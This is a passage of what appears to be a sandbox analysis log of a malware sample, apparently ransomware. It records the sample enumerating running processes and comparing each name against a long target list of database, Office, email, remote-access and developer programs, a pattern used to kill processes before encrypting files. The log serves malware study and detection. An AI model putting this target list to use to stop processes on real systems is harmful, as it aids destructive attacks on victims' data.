sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.744] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.745] lstrcmpiW (lpString1="svchost.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.745] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x33, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.745] lstrcmpiW (lpString1="svchost.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.746] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0112.747] lstrcmpiW (lpString1="audiodg.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.747] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.747] lstrcmpiW (lpString1="svchost.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.748] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.748] lstrcmpiW (lpString1="svchost.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.748] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0112.749] lstrcmpiW (lpString1="dwm.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.750] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0112.750] lstrcmpiW (lpString1="explorer.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.750] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0112.751] lstrcmpiW (lpString1="spoolsv.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.764] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.765] lstrcmpiW (lpString1="svchost.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.765] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0112.766] lstrcmpiW (lpString1="taskhost.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.766] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0112.767] lstrcmpiW (lpString1="taskeng.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.768] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="drama wide.exe")) returned 1 [0112.768] lstrcmpiW (lpString1="drama wide.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.769] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x730, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter_path.exe")) returned 1 [0112.770] lstrcmpiW (lpString1="letter_path.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.770] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="alpha cornwall peripheral.exe")) returned 1 [0112.770] lstrcmpiW (lpString1="alpha cornwall peripheral.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.771] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x60c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="vi affair.exe")) returned 1 [0112.771] lstrcmpiW (lpString1="vi affair.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, 